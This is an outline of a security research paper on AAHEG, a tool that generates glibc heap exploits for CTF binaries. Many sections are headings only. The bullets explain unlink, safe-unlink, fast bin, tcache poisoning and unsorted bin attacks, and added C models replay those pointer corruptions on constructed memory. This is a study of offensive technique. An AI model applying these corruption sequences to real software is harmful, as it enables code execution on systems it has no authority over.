AAHEG: Automatic Advanced Heap Exploit Generation Based on Abstract Syntax Tree
Figure 1. The heap structure in glibc.
Figure 2. Heap-related vulnerability.
Figure 3. Overview of AAHEG.
Figure 4. The function primitive to extract in binary files.
Figure 5. The Leak Libc AST through UAF vulnerability.
Figure 6. The Leak Libc AST through Heap Overflow vulnerability.
Figure 7. The Hijack Hooks AST through UAF vulnerability.
Figure 8. The Hijack Hooks AST through Heap Overflow vulnerability.
Figure 9. The Hijack Hooks AST through Off by Null vulnerability.
Figure 10. The Hijack Hooks AST through UAF vulnerability with bypassing tcache.
Figure 11. The flow chart of AAHEG.
Abstract
1. Introduction
- AAHEG applies symbolic execution to collect the information it needs from binary files automatically, without a PoC or source code, and detects heap-related vulnerabilities (Heap Overflow, Off by One, Off by Null and Use After Free) in those binaries.
- We surveyed the current advanced exploitation methods for heap-related vulnerabilities in glibc, the Linux heap manager, combined them with our own attack experience, and distilled each method into an exploit abstract syntax tree (AST). AAHEG combines the enabled protection mechanisms, the control flow graph (CFG) information of the functions and the heap-related primitives found in the binary, selects a suitable exploit method and completes the final exploit generation.
- AAHEG finally generates a file-form exploit built on the pwntools [12] library to support subsequent expert analysis, and verifies the generated exploit against the binary both as a local process and in a remote docker container. Experimental results show that AAHEG completes vulnerability detection and exploit generation for 20 Capture The Flag (CTF) binaries, 11 of which have all protection mechanisms enabled.
2. Related Work
2.1. Automatic Exploit Generation
2.2. Heap-Related Vulnerability and Heap-Related Exploit
- prev_size. If the physically preceding chunk is in use, this field has no meaning to the allocator and may hold the previous chunk's user data; if the preceding chunk is free, it holds that chunk's size, so that free() can walk backwards to it when consolidating.
- size. The size of the current chunk. Its lower 3 bits are the flags A, M and P, from high to low. A (NON_MAIN_ARENA) indicates whether the chunk belongs to the main arena: 0 means it does, 1 means it belongs to a non-main (thread) arena. M (IS_MMAPPED) is 1 if the chunk was obtained with the mmap system call [36] and 0 if it came from the heap grown with brk. P (PREV_INUSE) is 1 if the physically previous chunk is in use and 0 if it is free.
- fd/bk (forward/backward). If a chunk is in use, the user-controlled data starts at fd. If a chunk is free, fd and bk hold the linked-list pointers of its bin: fd points to the chunk released before it and bk to the chunk released after it. In fast bins and tcache bins only fd is used, because those bins are singly linked, last-in first-out (LIFO) lists. fd/bk is the core attack area of heap exploitation: unlink, fast bin attack and unsorted bin attack all target these fields.
- fd_nextsize/bk_nextsize. These two fields are only used in large bins, where they link chunks of different sizes; among heap exploitation techniques only the large bin attack targets them.
- Unlink. Unlink is the oldest attack method; it was first described in [37,38]. It uses a heap-related vulnerability to overwrite the list pointers of a chunk and then has glibc remove that chunk from its doubly linked list. The removal performs the two writes FD->bk = BK and BK->fd = FD, so a controlled fd/bk pair yields a write to an arbitrary address. In 2004 a patch added an integrity check on the doubly linked list (FD->bk == P and BK->fd == P), which made the original attack hard to exploit.
- Safe-unlink [39]. Safe-unlink lays out a fake chunk P whose fd and bk are set to ptr - 0x18 and ptr - 0x10 (64-bit), where ptr is the address of a pointer that points to P, so that both sides of the integrity check see P, and then triggers glibc's unlink on the fake chunk. The result is that *ptr becomes ptr - 0x18; since the program keeps writing through ptr, the attacker gains an arbitrary address write. The precondition is that the address of ptr is known in advance, which in practice means the binary does not have PIE enabled (or its base has already been leaked).
- Fast bin attack [40]. A fast bin attack modifies the fd of a chunk that is already in a fast bin so that it points to a fake chunk, then allocates two chunks of that size: the second allocation returns the fake chunk. The fake chunk's size field must match the size of the bin it is taken from, which is why __malloc_hook is the usual target: the bytes just before it form a plausible 0x7f size. The hook is overwritten with a one_gadget [41] address and the next call to malloc hijacks the control flow of the program.
- Tcache poisoning [40]. Tcache was added in glibc 2.26 (shipped with Ubuntu 17.10) to speed up chunk allocation; its data structure resembles the fast bins. Tcache poisoning overwrites the fd (called next in glibc) of a chunk sitting in a tcache bin with a target address, so that a later allocation of that size returns the target, in the same way as a fast bin attack but with fewer checks on the fake chunk. Since glibc 2.32 the next pointer is mangled by safe-linking (the pointer is XORed with the address of the field shifted right by 12 bits), so the attacker must know a heap address before writing the target.
- Unsorted bin attack [40]. The unsorted bin attack modifies the bk of a chunk already in the unsorted bin to target - 0x10 (64-bit). When that chunk is taken out of the unsorted bin by malloc, glibc writes the address of the unsorted bin head (main_arena + 88 on 64-bit glibc 2.23), a large value, to the target. On its own the unsorted bin attack cannot hijack control flow and has to be combined with other exploitation methods.
- The House of Series. The House of series was first proposed by Phantasmagoria in The Malloc Maleficarum [42], which introduced five attacks on glibc malloc including The House of Force. The naming scheme carried over to later exploits of glibc's heap manager, such as The House of Orange and The House of Rabbit.
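The two list attacks above (Safe-unlink and unsorted bin attack) can be traced on constructed chunks without touching a real heap. The following C model is an added example, not code from the AAHEG paper or from glibc: it reimplements only the checks and the writes of glibc's unlink_chunk, the backward-consolidation path of _int_free and the unsorted-bin removal in _int_malloc. The names bss, list, heap and target, the chunk sizes and the 64-bit layout are assumptions standing in for a CTF-style menu binary.

```c
#include <stddef.h>
#include <stdint.h>

/* glibc's chunk header (64-bit): the fields described above. */
typedef struct malloc_chunk {
    size_t prev_size, size;
    struct malloc_chunk *fd, *bk;                 /* list links; user data when in use */
    struct malloc_chunk *fd_nextsize, *bk_nextsize;
} mchunk;

#define SIZE_BITS        7UL
#define chunksize(p)     ((p)->size & ~SIZE_BITS)
#define chunk_at(p, off) ((mchunk *)((char *)(p) + (off)))

/* glibc's unlink_chunk reduced to its two checks and its two writes. */
static int unlink_chunk(mchunk *p)
{
    if (chunksize(p) != chunk_at(p, chunksize(p))->prev_size)
        return -1;                                /* "corrupted size vs. prev_size" */
    mchunk *fd = p->fd, *bk = p->bk;
    if (fd->bk != p || bk->fd != p)
        return -2;                                /* "corrupted double-linked list" (the 2004 check) */
    fd->bk = bk;                                  /* write 1: *(fd + 0x18) = bk */
    bk->fd = fd;                                  /* write 2: *(bk + 0x10) = fd */
    return 0;
}

/* Backward consolidation in _int_free when PREV_INUSE of `p` is clear. */
static int free_consolidate_backward(mchunk *p)
{
    if (p->size & 1) return 0;                    /* PREV_INUSE set: nothing to merge */
    size_t prevsize = p->prev_size;
    mchunk *prev = chunk_at(p, -(long)prevsize);
    if (chunksize(prev) != prevsize)
        return -3;                                /* "corrupted size vs. prev_size while consolidating" */
    return unlink_chunk(prev);
}

/* Assumed program globals: the List pointer array of a menu binary, with other
 * .bss data in front of it so that ptr - 0x18 still lies inside `bss`. */
static struct { uintptr_t other[3]; mchunk *list[4]; } bss;
static _Alignas(16) unsigned char heap[0x200];    /* constructed heap region */

uintptr_t list0_addr(void) { return (uintptr_t)&bss.list[0]; }

/* Safe-unlink: list[0] -> chunk0's user data, chunk1 physically follows chunk0.
 * Returns the value list[0] holds after Free(1); 0 if glibc would have aborted. */
uintptr_t safe_unlink_demo(void)
{
    mchunk *chunk0 = (mchunk *)heap;
    mchunk *chunk1 = chunk_at(chunk0, 0x90);
    mchunk *fake   = chunk_at(chunk0, 0x10);      /* fake chunk at the start of chunk0's data */
    uintptr_t ptr  = list0_addr();
    chunk0->size = 0x91;
    bss.list[0] = fake;                           /* what Add(0) stored: the user pointer */
    bss.list[1] = chunk_at(chunk1, 0x10);

    /* Edit(0): write the fake chunk and overflow into chunk1's header */
    fake->prev_size = 0;
    fake->size = 0x80;                            /* distance from fake to chunk1 */
    fake->fd = (mchunk *)(ptr - 0x18);            /* fd->bk == *ptr == fake */
    fake->bk = (mchunk *)(ptr - 0x10);            /* bk->fd == *ptr == fake */
    chunk1->prev_size = 0x80;                     /* must equal chunksize(fake) */
    chunk1->size = 0x90;                          /* PREV_INUSE cleared: "chunk0 is free" */

    /* Free(1): glibc consolidates backwards and unlinks the fake chunk */
    if (free_consolidate_backward(chunk1) != 0) return 0;
    return (uintptr_t)bss.list[0];                /* now ptr - 0x18: Edit(0) writes over the list itself */
}

/* Unsorted bin attack: the victim chunk sits alone in the unsorted bin and its bk is
 * overwritten with target - 0x10. Returns what malloc wrote into the target; `checked`
 * models the bck->fd != victim check of newer glibc, which aborts the attack. */
static mchunk unsorted_bin;                       /* stands in for main_arena's unsorted bin head */
static struct { uintptr_t pad[2]; uintptr_t value; } target;

uintptr_t unsorted_bin_addr(void) { return (uintptr_t)&unsorted_bin; }

uintptr_t unsorted_bin_attack_demo(int checked)
{
    mchunk *victim = chunk_at(heap, 0x120);
    target.value = 0;
    unsorted_bin.fd = unsorted_bin.bk = victim;
    victim->fd = victim->bk = &unsorted_bin;

    victim->bk = (mchunk *)((char *)&target.value - 0x10);   /* the corrupting write */

    /* _int_malloc taking `victim` off the unsorted bin: */
    mchunk *bck = victim->bk;
    if (checked && bck->fd != victim) return 0;   /* "malloc(): corrupted unsorted chunks 3" */
    unsorted_bin.bk = bck;
    bck->fd = &unsorted_bin;                      /* lands at (target - 0x10) + 0x10 = target */
    return target.value;
}
```

safe_unlink_demo() returns ptr - 0x18: the program's own List entry now points 0x18 bytes before the List, so the next Edit(0) overwrites the List array and every later Edit becomes an arbitrary write. unsorted_bin_attack_demo(0) returns the address of the bin head (main_arena + 88 on real 64-bit glibc 2.23), and the checked variant shows why the attack stops working once glibc verifies bck->fd before the removal.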
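Tcache poisoning (and the way fast bin attack behaves, since the bins share the singly linked shape) is easiest to understand as an operation on the bin itself. The following C model is an added example, not code from the AAHEG paper or from glibc: it reimplements tcache_put/tcache_get with the double-free key check of glibc 2.29+, the alignment check and the safe-linking pointer mangling of glibc 2.32+, and then runs the poisoning sequence against a constructed heap. The victim layout, the target object secret and the key constant are assumptions.

```c
#include <stddef.h>
#include <stdint.h>

typedef struct tcache_entry {
    struct tcache_entry *next;       /* the "fd" that tcache poisoning overwrites */
    uintptr_t key;                   /* glibc >= 2.29: marks "this chunk is in tcache" */
} tcache_entry;

typedef struct { tcache_entry *head; int count; int safe_linking; } tcache_bin;

#define TCACHE_KEY 0x5a5a5a5aUL      /* constructed; glibc uses a per-process random key since 2.34 */

/* glibc's PROTECT_PTR / REVEAL_PTR (2.32+): XOR the link with (address of the link) >> 12. */
static uintptr_t protect_ptr(const void *pos, uintptr_t ptr)
{
    return ((uintptr_t)pos >> 12) ^ ptr;
}

static tcache_entry *next_of(const tcache_bin *bin, tcache_entry *e)
{
    uintptr_t raw = (uintptr_t)e->next;
    return (tcache_entry *)(bin->safe_linking ? protect_ptr(&e->next, raw) : raw);
}

/* tcache_put as in free(): returns -1 for "free(): double free detected in tcache 2". */
static int tcache_put(tcache_bin *bin, tcache_entry *e)
{
    if (e->key == TCACHE_KEY)                     /* looks freed: confirm by walking the bin */
        for (tcache_entry *t = bin->head; t; t = next_of(bin, t))
            if (t == e) return -1;
    uintptr_t raw = (uintptr_t)bin->head;
    e->next = (tcache_entry *)(bin->safe_linking ? protect_ptr(&e->next, raw) : raw);
    e->key = TCACHE_KEY;
    bin->head = e;
    bin->count++;
    return 0;
}

/* tcache_get as in malloc(): pops the head; NULL models "malloc(): unaligned tcache chunk detected". */
static tcache_entry *tcache_get(tcache_bin *bin)
{
    tcache_entry *e = bin->head;
    if (e == NULL || ((uintptr_t)e & 0xf) != 0) return NULL;
    bin->head = next_of(bin, e);
    bin->count--;
    e->key = 0;
    return e;
}

/* Constructed victim memory: the user areas of two 0x20-byte chunks, and the target
 * object standing in for __free_hook or any other address malloc should hand out. */
static _Alignas(16) unsigned char heap[0x100];
static _Alignas(16) struct { uintptr_t w0, w1; } secret;

uintptr_t target_addr(void) { return (uintptr_t)&secret; }

/* Free two chunks, overwrite the head chunk's next through a UAF write, take one chunk
 * back, and report the address the following malloc of that size would return.
 * leaked_heap: whether the attacker knows a heap address to compute the safe-linking mask. */
uintptr_t tcache_poison_demo(int safe_linking, int leaked_heap)
{
    tcache_bin bin = { NULL, 0, safe_linking };
    tcache_entry *a = (tcache_entry *)(heap + 0x10);
    tcache_entry *b = (tcache_entry *)(heap + 0x30);
    a->key = b->key = 0;
    tcache_put(&bin, a);                          /* free(a) */
    tcache_put(&bin, b);                          /* free(b): bin is b -> a -> NULL */
    if (tcache_put(&bin, b) != -1) return 0;      /* free(b) again is caught by the key check */

    uintptr_t want = (uintptr_t)&secret;          /* Edit(b) after free: UAF write of next */
    b->next = (tcache_entry *)((safe_linking && leaked_heap) ? protect_ptr(&b->next, want) : want);

    if (tcache_get(&bin) != b) return 0;          /* malloc(0x18) hands back b */
    return (uintptr_t)bin.head;                   /* the next malloc(0x18) returns this */
}
```

Without safe-linking the raw target address written into next is enough; with safe-linking the same raw write leaves a garbage head, and the attack only works after a heap address has been leaked and used to mangle the pointer, which is why the Leak Libc ASTs run before the Hijack Hooks ASTs.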
3. Overview of AAHEG
3.1. Modules in AAHEG
- Static analysis of binary files. This stage collects information about the binary, in particular which protection mechanisms are enabled, such as whether PIE is on.
- Primitive extraction. Primitive extraction covers the extraction of branch paths, their conditions and the primitive grammar. Branch path extraction records the conditions under which malloc, free and the other heap functions are reached. The primitive grammar, put simply, is the parameter range of each function's parameters: the size written to a chunk, the address where the chunk pointer is stored, the allowed size argument of malloc, and so on.
- Vulnerability analyzer. The vulnerability analyzer solves the vulnerability constraints against the conditions in the extracted primitives. For example, to determine whether there is a Heap Overflow it checks whether the number of bytes written into a chunk can exceed the size requested from malloc when the chunk was allocated; this can be decided from the primitive grammar extracted before.
- Exploit generator. The exploit generator searches for an AST path that successfully exploits the vulnerabilities found by the vulnerability analyzer. The ASTs are constructed from expert experience. The generator takes the protection mechanism information into account, generates the final exploit from the abstract syntax tree, and verifies with the SMT solver that the conditions along the path can be satisfied.
- Exploit verifier. The exploit verifier checks whether the exploit produced by the exploit generator obtains the permissions of the target host. AAHEG either runs the binary as a local process or starts a remote docker container to simulate the remote environment. If the exploit obtains the target host's permissions, verification succeeds; otherwise it fails.
- File-form exploit generator. The file-form exploit generator produces exploit files based on pwntools. First, a Python function is generated for each primitive from the primitive grammar; then the code for the AST branch selected by the exploit generator is emitted on top of these functions; finally a complete exploit is assembled. The generated exploit is a Python script with gdb attachment built in, so that experts can perform subsequent verification and analysis.
3.2. Attack Model
3.3. Overview
4. Primitive Extraction
- Constraint path extraction. AAHEG first extracts the constraint paths, i.e., the path conditions from the program entry to each branch. This step (Figure 4) has two tasks. The first is to build the control flow graph (CFG) of the program and extract the exit points of the switch-case statement that dispatches the menu, which correspond to exit nodes of the CFG. When extracting exit nodes, the default branch of the switch and error-reporting branches are pruned: a branch is kept only if it calls an internal function, and branches that only call external functions such as puts or printf are dropped. The second is to use Angr [43], a symbolic execution tool, to solve the constraints of each remaining branch path.
- Function analysis. The second step of primitive extraction is an automated analysis of what each function does. The first part is identifying the List pointer: AAHEG searches the .bss segment and other global segments for addresses indexed by the functions above (Add, Edit, etc.) and marks them as candidate List pointers. AAHEG uses two-way confirmation: after finding a candidate List pointer it searches for a candidate Add function and checks where that function stores malloc's return value (judged by the distance between the addresses or by the parameters); this confirms both that the function is Add and that the address is a List pointer. Once the List pointer is known, the remaining functions are classified by their characteristics: Free calls free with an argument derived from the List pointer; Edit does not call malloc but writes to an address taken from the List; Show calls an output function on an address taken from the List.
- Constraint paths correspond to functions. After extracting the constraint paths and the function names, AAHEG matches each function name with its path and records the path condition as the condition of the function. Concretely, the information extracted is the correspondence shown in Figure 4: entering 1 reaches the Add function and entering 2 reaches the Edit function.
- Key parameter information extraction. This step determines whether each parameter (index, size, content) exists and what range it may take. For example, in the Add function the value of index is traced to determine its range, based on where the last malloc return value is stored. Next, the value range of the malloc size argument is determined directly by hooking the malloc function and querying the SMT solver in Angr: once execution reaches malloc, its argument is probed for its minimum and maximum values.
5. Vulnerability Detection
6. Exploit Abstract Syntax Tree
```c
/* glibc _int_free, backward consolidation of a chunk whose PREV_INUSE bit is clear */
p = chunk_at_offset(p, -((long) prevsize));
if (__glibc_unlikely (chunksize(p) != prevsize))
    malloc_printerr ("corrupted size vs. prev_size while consolidating");
```
- Sequence type (S): the two child operations execute one after another; the left subtree precedes the right subtree.
- Multiplication type (M): the right subtree gives the number of times the operation in the left subtree is repeated.
- Condition type (C): the operation in the left subtree may only be performed when the condition in the right subtree is met.
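The three node types are enough to turn an exploit AST into the flat sequence of primitive calls that the file-form exploit later emits. The following C program is an added example, not code from AAHEG: it defines leaf nodes for the Add/Edit/Show/Free primitives of the function table, expands S/M/C nodes, and uses an assumed tree for the leak-libc-with-tcache-bypass idea of Figure 10 (fill the tcache bin with seven frees, then free one more chunk into the unsorted bin and Show it to read the main_arena pointer left in its fd). The condition check is a plain predicate standing in for the SMT query the paper performs.

```c
#include <stddef.h>
#include <stdio.h>

typedef enum { ADD, EDIT, SHOW, FREE } prim_kind;      /* leaves: the menu primitives */
typedef enum { LEAF, SEQ, MUL, COND } node_kind;       /* SEQ/MUL/COND are the S/M/C node types */

typedef struct node {
    node_kind kind;
    prim_kind prim;                  /* LEAF */
    size_t arg;                      /* LEAF: size for ADD, index otherwise */
    const struct node *left, *right; /* SEQ: left then right; MUL/COND: left is the body */
    size_t times;                    /* MUL: repetition count (the paper's right subtree) */
    int indexed;                     /* MUL: add the iteration number to each emitted index */
    int (*cond)(void);               /* COND: predicate standing in for the SMT-checked condition */
} node;

typedef struct { prim_kind prim; size_t arg; } op;

/* Expand the tree rooted at n into out[pos..]; returns the new length, or -1 when a
 * condition does not hold or the buffer is full (the paper then tries another AST path). */
static long expand(const node *n, op *out, long cap, long pos)
{
    switch (n->kind) {
    case LEAF:
        if (pos >= cap) return -1;
        out[pos].prim = n->prim;
        out[pos].arg = n->arg;
        return pos + 1;
    case SEQ: {
        long mid = expand(n->left, out, cap, pos);
        return mid < 0 ? -1 : expand(n->right, out, cap, mid);
    }
    case MUL: {
        long p = pos;
        for (size_t i = 0; i < n->times; i++) {
            long q = expand(n->left, out, cap, p);
            if (q < 0) return -1;
            if (n->indexed)
                for (long k = p; k < q; k++) out[k].arg += i;
            p = q;
        }
        return p;
    }
    case COND:
        return n->cond() ? expand(n->left, out, cap, pos) : -1;
    }
    return -1;
}

/* Assumed tree: Add(0x80) x 8, Free(1..7) to fill the tcache bin, then, only if a UAF
 * exists, Free(0) (lands in the unsorted bin, chunk 1 shields it from the top chunk)
 * and Show(0) to read the libc pointer out of the freed chunk. */
static int g_have_uaf = 0;
static int have_uaf(void) { return g_have_uaf; }

static const node add80   = { .kind = LEAF, .prim = ADD,  .arg = 0x80 };
static const node free_i  = { .kind = LEAF, .prim = FREE, .arg = 1 };
static const node free0   = { .kind = LEAF, .prim = FREE, .arg = 0 };
static const node show0   = { .kind = LEAF, .prim = SHOW, .arg = 0 };
static const node fill    = { .kind = MUL,  .left = &add80, .times = 8 };
static const node drain   = { .kind = MUL,  .left = &free_i, .times = 7, .indexed = 1 };
static const node prepare = { .kind = SEQ,  .left = &fill, .right = &drain };
static const node leak    = { .kind = SEQ,  .left = &free0, .right = &show0 };
static const node guarded = { .kind = COND, .left = &leak, .cond = have_uaf };
static const node root    = { .kind = SEQ,  .left = &prepare, .right = &guarded };

long leak_libc_plan(op *out, long cap, int uaf_present)
{
    g_have_uaf = uaf_present;
    return expand(&root, out, cap, 0);
}

/* Helpers for inspecting a plan: run it once, then query position i. */
static op g_plan[32];
static long g_plan_len = -1;
long plan_len(int uaf_present, long cap) { return g_plan_len = leak_libc_plan(g_plan, cap, uaf_present); }
int plan_op_is(long i, prim_kind prim, size_t arg)
{
    return i < g_plan_len && g_plan[i].prim == prim && g_plan[i].arg == arg;
}

int main(void)
{
    static const char *names[] = { "add", "edit", "show", "free" };
    long n = plan_len(1, 32);
    for (long i = 0; i < n; i++)                  /* print in the shape of the pwntools helpers */
        printf("%s(%#zx)\n", names[g_plan[i].prim], g_plan[i].arg);
    return n < 0;
}
```

Expansion yields 17 primitive calls when the UAF condition holds and fails (returns -1) otherwise, which is the point at which the exploit generator would move on to another AST path.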
7. Exploit Generation
- Mark the elements of the generated payload, in particular the address information that must be known before the payload can be instantiated.
- The preamble payload is responsible for leaking the information that subsequent payloads need. If a required address is still unknown when a payload is instantiated, instantiation fails and the payload has to be regenerated.
8. Evaluation
8.1. Experimental Setup
8.2. CTF Benchmark Evaluation
9. Discussion
9.1. Limitations
9.2. Future Work
9.3. Related Work
10. Conclusions
Author Contributions
Funding
Data Availability Statement
Conflicts of Interest
References
1. Song, J.; Alves-Foss, J. The DARPA Cyber Grand Challenge: A Competitor's Perspective. IEEE Secur. Priv. 2015, 13, 72–76.
2. Huang, S.; Huang, M.; Huang, P.; Lai, C.; Lu, H.; Leong, W. CRAX: Software Crash Analysis for Automatic Exploit Generation by Modeling Attacks as Symbolic Continuations. In Proceedings of the Sixth International Conference on Software Security and Reliability, SERE 2012, Gaithersburg, MD, USA, 20–22 June 2012; pp. 78–87.
3. Cha, S.K.; Avgerinos, T.; Rebert, A.; Brumley, D. Unleashing Mayhem on Binary Code. In Proceedings of the IEEE Symposium on Security and Privacy, SP 2012, San Francisco, CA, USA, 21–23 May 2012; pp. 380–394.
4. Kc, G.S.; Keromytis, A.D. e-NeXSh: Achieving an Effectively Non-Executable Stack and Heap via System-Call Policing. In Proceedings of the 21st Annual Computer Security Applications Conference (ACSAC 2005), Tucson, AZ, USA, 5–9 December 2005; pp. 286–302.
5. Xu, S.; Wang, Y. BofAEG: Automated Stack Buffer Overflow Vulnerability Detection and Exploit Generation Based on Symbolic Execution and Dynamic Analysis. Secur. Commun. Netw. 2022, 2022, 1251987.
6. Mow, W.; Huang, S.; Hsiao, H. LAEG: Leak-based AEG using Dynamic Binary Analysis to Defeat ASLR. In Proceedings of the IEEE Conference on Dependable and Secure Computing, DSC 2022, Edinburgh, UK, 22–24 June 2022; pp. 1–8.
7. Wang, Y.; Zhang, C.; Xiang, X.; Zhao, Z.; Li, W.; Gong, X.; Liu, B.; Chen, K.; Zou, W. Revery: From Proof-of-Concept to Exploitable. In Proceedings of the 2018 ACM SIGSAC Conference on Computer and Communications Security, CCS 2018, Toronto, ON, Canada, 15–19 October 2018; Lie, D., Mannan, M., Backes, M., Wang, X., Eds.; ACM: New York, NY, USA, 2018; pp. 1914–1927.
8. Wang, Y.; Zhang, C.; Zhao, Z.; Zhang, B.; Gong, X.; Zou, W. MAZE: Towards Automated Heap Feng Shui. In Proceedings of the 30th USENIX Security Symposium, USENIX Security 2021, Online, 11–13 August 2021; Bailey, M., Greenstadt, R., Eds.; USENIX Association: Berkeley, CA, USA, 2021; pp. 1647–1664.
9. Position-Independent Code. Available online: https://en.wikipedia.org/wiki/Position-independent_code (accessed on 30 October 2023).
10. Bierbaumer, B.; Kirsch, J.; Kittel, T.; Francillon, A.; Zarras, A. Smashing the Stack Protector for Fun and Profit. In Proceedings of the 24th IFIP World Computer Congress, WCC 2018, Poznan, Poland, 18–20 September 2018; Janczewski, L.J., Kutylowski, M., Eds.; Springer: Berlin/Heidelberg, Germany, 2018; Volume 529, pp. 293–306.
11. FULL RELRO. Available online: https://www.redhat.com/en/blog/hardening-elf-binaries-using-relocation-read-onlyrelro (accessed on 30 October 2023).
12. Pwntools. CTF Framework and Exploit Development Library. 2020. Available online: https://github.com/Gallopsled/pwntools (accessed on 1 December 2023).
13. Wang, R.; Pan, Z.; Shi, F.; Zhang, M. Aemb: An automated exploit mitigation bypassing solution. Appl. Sci. 2021, 11, 9727.
14. He, L.; Cai, Y.; Hu, H.; Su, P.; Liang, Z.; Yang, Y.; Huang, H.; Yan, J.; Jia, X.; Feng, D. Automatically assessing crashes from heap overflows. In Proceedings of the 32nd IEEE/ACM International Conference on Automated Software Engineering, ASE 2017, Urbana, IL, USA, 30 October–3 November 2017; Rosu, G., Penta, M.D., Nguyen, T.N., Eds.; IEEE Computer Society: Washington, DC, USA, 2017; pp. 274–279.
15. Avgerinos, T.; Cha, S.K.; Rebert, A.; Schwartz, E.J.; Woo, M.; Brumley, D. Automatic exploit generation. Commun. ACM 2014, 57, 74–84.
16. Huang, N.; Huang, S.; Chang, C. Analysis to heap overflow exploit in linux with symbolic execution. In IOP Conference Series: Earth and Environmental Science; IOP Publishing: Bristol, UK, 2019; Volume 252, p. 042100.
17. Zhao, Z.; Wang, Y.; Gong, X. HAEPG: An Automatic Multi-hop Exploitation Generation Framework. In Proceedings of the Detection of Intrusions and Malware, and Vulnerability Assessment, 17th International Conference, DIMVA 2020, Lisbon, Portugal, 24–26 June 2020; Maurice, C., Bilge, L., Stringhini, G., Neves, N., Eds.; Springer: Berlin/Heidelberg, Germany, 2020; Volume 12223, pp. 89–109.
18. Sotirov, A. Heap feng shui in javascript. Black Hat Eur. 2007, 2007, 11–20.
19. Yun, I.; Kapil, D.; Kim, T. Automatic Techniques to Systematically Discover New Heap Exploitation Primitives. In Proceedings of the 29th USENIX Security Symposium, USENIX Security 2020, Boston, MA, USA, 12–14 August 2020; Capkun, S., Roesner, F., Eds.; USENIX Association: Berkeley, CA, USA, 2020; pp. 1111–1128.
20. Zhang, B.; Chen, J.; Li, R.; Feng, C.; Li, R.; Tang, C. Automated Exploitable Heap Layout Generation for Heap Overflows Through Manipulation Distance-Guided Fuzzing. In Proceedings of the 32nd USENIX Security Symposium, USENIX Security 2023, Anaheim, CA, USA, 9–11 August 2023; Calandrino, J.A., Troncoso, C., Eds.; USENIX Association: Berkeley, CA, USA, 2023; pp. 4499–4515.
21. Heelan, S.; Melham, T.; Kroening, D. Automatic Heap Layout Manipulation for Exploitation. In Proceedings of the 27th USENIX Security Symposium, USENIX Security 2018, Baltimore, MD, USA, 15–17 August 2018; Enck, W., Felt, A.P., Eds.; USENIX Association: Berkeley, CA, USA, 2018; pp. 763–779.
22. Gennissen, J.; O'Keeffe, D. Hack the Heap: Heap Layout Manipulation made Easy. In Proceedings of the 43rd IEEE Security and Privacy, SP Workshops 2022, San Francisco, CA, USA, 22–26 May 2022; pp. 289–300.
23. Li, R.; Zhang, B.; Chen, J.; Lin, W.; Feng, C.; Tang, C. Towards Automatic and Precise Heap Layout Manipulation for General-Purpose Programs. In Proceedings of the 30th Annual Network and Distributed System Security Symposium, NDSS 2023, San Diego, CA, USA, 27 February–3 March 2023.
24. Kang, X.; Debray, S. A Framework for Automatic Exploit Generation for JIT Compilers. In Proceedings of the Checkmate@CCS 2021, Research on offensive and defensive techniques in the Context of Man at the End (MATE) Attacks, Virtual Event, Republic of Korea, 19 November 2021; Hauser, C., Kwon, Y., Banescu, S., Eds.; ACM: New York, NY, USA, 2021; pp. 11–19.
25. Jin, L.; Cao, Y.; Chen, Y.; Zhang, D.; Campanoni, S. ExGen: Cross-platform, Automated Exploit Generation for Smart Contract Vulnerabilities. IEEE Trans. Dependable Secur. Comput. 2023, 20, 650–664.
26. Krupp, J.; Rossow, C. teEther: Gnawing at Ethereum to Automatically Exploit Smart Contracts. In Proceedings of the 27th USENIX Security Symposium, USENIX Security 2018, Baltimore, MD, USA, 15–17 August 2018; Enck, W., Felt, A.P., Eds.; USENIX Association: Berkeley, CA, USA, 2018; pp. 1317–1333.
27. Huang, S.; Huang, M.; Huang, P.; Lu, H.; Lai, C. Software Crash Analysis for Automatic Exploit Generation on Binary Programs. IEEE Trans. Reliab. 2014, 63, 270–289.
28. Jiang, Z.; Zhang, Y.; Xu, J.; Sun, X.; Liu, Z.; Yang, M. AEM: Facilitating Cross-Version Exploitability Assessment of Linux Kernel Vulnerabilities. In Proceedings of the 44th IEEE Symposium on Security and Privacy, SP 2023, San Francisco, CA, USA, 21–25 May 2023; pp. 2122–2137.
29. Wu, W.; Chen, Y.; Xu, J.; Xing, X.; Gong, X.; Zou, W. FUZE: Towards Facilitating Exploit Generation for Kernel Use-After-Free Vulnerabilities. In Proceedings of the 27th USENIX Security Symposium, USENIX Security 2018, Baltimore, MD, USA, 15–17 August 2018; Enck, W., Felt, A.P., Eds.; USENIX Association: Berkeley, CA, USA, 2018; pp. 781–797.
30. Feng, Z.; Guo, D.; Tang, D.; Duan, N.; Feng, X.; Gong, M.; Shou, L.; Qin, B.; Liu, T.; Jiang, D.; et al. CodeBERT: A Pre-Trained Model for Programming and Natural Languages. In Proceedings of the Findings of the Association for Computational Linguistics: EMNLP 2020, Online Event, 16–20 November 2020; Cohn, T., He, Y., Liu, Y., Eds.; Association for Computational Linguistics: Toronto, ON, Canada, 2020; Volume EMNLP 2020, pp. 1536–1547.
31. Liguori, P.; Al-Hossami, E.; Cotroneo, D.; Natella, R.; Cukic, B.; Shaikh, S. Can we generate shellcodes via natural language? An empirical study. Autom. Softw. Eng. 2022, 29, 30.
32. Yang, G.; Chen, X.; Zhou, Y.; Yu, C. DualSC: Automatic Generation and Summarization of Shellcode via Transformer and Dual Learning. In Proceedings of the IEEE International Conference on Software Analysis, Evolution and Reengineering, SANER 2022, Honolulu, HI, USA, 15–18 March 2022; pp. 361–372.
33. Liguori, P.; Al-Hossami, E.; Orbinato, V.; Natella, R.; Shaikh, S.; Cotroneo, D.; Cukic, B. EVIL: Exploiting Software via Natural Language. In Proceedings of the 32nd IEEE International Symposium on Software Reliability Engineering, ISSRE 2021, Wuhan, China, 25–28 October 2021; Jin, Z., Li, X., Xiang, J., Mariani, L., Liu, T., Yu, X., Ivaki, N., Eds.; IEEE: Piscataway, NJ, USA, 2021; pp. 321–332.
34. Yang, G.; Zhou, Y.; Chen, X.; Zhang, X.; Han, T.; Chen, T. ExploitGen: Template-augmented exploit code generation based on CodeBERT. J. Syst. Softw. 2023, 197, 111577.
35. Gloger, W. Ptmalloc. 2006. Available online: https://github.com/hustfisher/ptmalloc/blob/master/malloc.c (accessed on 1 December 2023).
36. Linux Manual Page. 2023. Available online: https://man7.org/linux/man-pages/man2/syscalls.2.html (accessed on 1 December 2023).
37. MaXX. Vudo—An Object Superstitiously Believed to Embody Magical Powers. 2001. Available online: http://phrack.org/issues/57/8.html (accessed on 1 December 2023).
38. Once upon a Free(). 2001. Available online: http://phrack.org/issues/57/9.html (accessed on 1 December 2023).
